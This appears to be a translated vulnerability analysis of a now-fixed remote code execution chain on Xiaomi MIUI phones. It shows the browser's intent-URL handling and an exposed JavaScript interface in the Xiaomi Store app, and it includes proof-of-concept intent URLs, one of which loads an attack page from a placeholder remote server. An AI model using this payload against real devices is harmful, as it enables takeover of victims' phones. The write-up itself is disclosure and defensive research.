Xiaomi mobile phone MIUI Remote Code execution Vulnerability Analysis

July I was in the study of WebView loopholes in the miui of Xiaomi mobile phone test, found a very obvious security loopholes. This vulnerability allows remote access to local apps, breaking the boundaries of local vulnerabilities and remote vulnerabilities, so that local app vulnerabilities can be exploited remotely. Achieve the effect of GE. In the first time the vulnerability was discovered, I have reported the vulnerability details to the Xiaomi Security Response Center, which has now been fixed.

Test environment: Mobile phone Model: MI 3
Android version: 4.2.1 jop40d
MIUI version: Miui-jxccnbe21
Kernel version: 3.4.35-GA656AB9

I. Xiaomi MIUI native Browser There is an intent protocol security issue

In the use of Xiaomi native browser when I found that MIUI custom network exception page, such as the current URL is not accessible or network anomalies will jump to the customized Web page, by clicking on the link in the page can be directly into the WiFi settings interface.

According to my previous experience, there are two ways for the app to mainstream interprocess communication in static Web pages, one is to add a JavaScript bridging interface to WebView via Addjavascriptinterface, The local Java interface can be manipulated directly by invoking this interface. Another approach is to use Intent.parseuri to parse the URL, let the app support intent scheme URLs (Intent Protocol URL), and send intent directly to the system by parsing a URL in a particular format.

After the test, I did find that Xiaomi browser fully supports the intent protocol URL, the test process is as follows, let Xiaomi browser directly access the following address, the browser will be launched to the system intention to launch the local calendar app

intent:#Intent;component=com.android.calendar/com.android.calendar.LaunchActivity;end

I'm going through the source code of intent in Google's official framework:

/platform/frameworks/base/+/core/java/android/content/intent.java

Intent.parseuri Definition of 3966 rows

if(uri.startsWith("S.", i)) b.putString(key, value);

elseif(uri.startsWith("B.", i)) b.putBoolean(key, Boolean.parseBoolean(value));

elseif(uri.startsWith("b.", i)) b.putByte(key, Byte.parseByte(value));

elseif(uri.startsWith("c.", i)) b.putChar(key, value.charAt(0));

elseif(uri.startsWith("d.", i)) b.putDouble(key, Double.parseDouble(value));

elseif(uri.startsWith("f.", i)) b.putFloat(key, Float.parseFloat(value));

elseif(uri.startsWith("i.", i)) b.putInt(key, Integer.parseInt(value));

elseif(uri.startsWith("l.", i)) b.putLong(key, Long.parseLong(value));

elseif(uri.startsWith("s.", i)) b.putShort(key, Short.parseShort(value));

elsethrow newURISyntaxException(uri, "unknown EXTRA type", i);

You can clearly see that Intent.parseuri parse the URL can be fully customizable extra data and data and acion, and so on, through the format of the protocol address to any local app to send arbitrary intentions, so if a local app export component has a vulnerability, We can also make a remote attack from this portal.

two. Xiaomi Store exists WebView Remote Code Execution vulnerability

Along the first part of the train of thought, I started to audit the preinstalled and built-in apps in the MIUI system, hoping to uncover vulnerabilities that could be exploited remotely. In the automatic vulnerability scanning, I found that Xiaomi's official app "Xiaomi store" WebView used Addjavascriptinterface, and the compile API level is less than 17, there may be a WebView remote code execution vulnerability.

So I made a reverse analysis of the app and found several export components of the app, such as the Com.xiaomi.shop.activity.MainActivity component accept parameter that can be loaded by external calls to arbitrary pages.

At the same time I found out that the Com.xiaomi.shop.ui class associated with the component initialized a Addjavascriptinterface vulnerability interface called We, and did not do any security processing.

According to the reverse code, com.xiaomi.shop.activity.MainActivity This active component accepts the extra data is a string type, combined with the first part of the Xiaomi Browser Intent Protocol vulnerability, can easily write the vulnerability verification code, Javascriptinterface interface with vulnerabilities through imported web pages we are able to execute arbitrary commands and Java code with the privileges of the current app

intent:#Intent;component=com.xiaomi.shop/com.xiaomi.shop.activity.MainActivity;S.com.xiaomi.shop.extra_closed_url=http://server/acttack.html;end

three. safety recommendations.

Android developers should pay attention to the development of user experience as well as security, because the ease of use of an app makes the whole system less secure.

The vulnerability of this analysis, if it is a malicious attacker, by loading the remote malicious Web page exploit root exploits, can directly control the victim's cell phone, the consequences are unthinkable. It is known that Xiaomi has fixed the Xiaomi store app bug, it is recommended that Xiaomi mobile phone and MIUI users to upgrade as soon as possible.

Reference:

[1]htTps://github.com/android/platform_frameworks_base/blob/master/core/java/android/content/intent.java

[2] http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-4710

Original address: http://blogs.360.cn/360mobile/2014/08/25/miui-rce-vul/

Xiaomi mobile phone MIUI Remote Code execution Vulnerability Analysis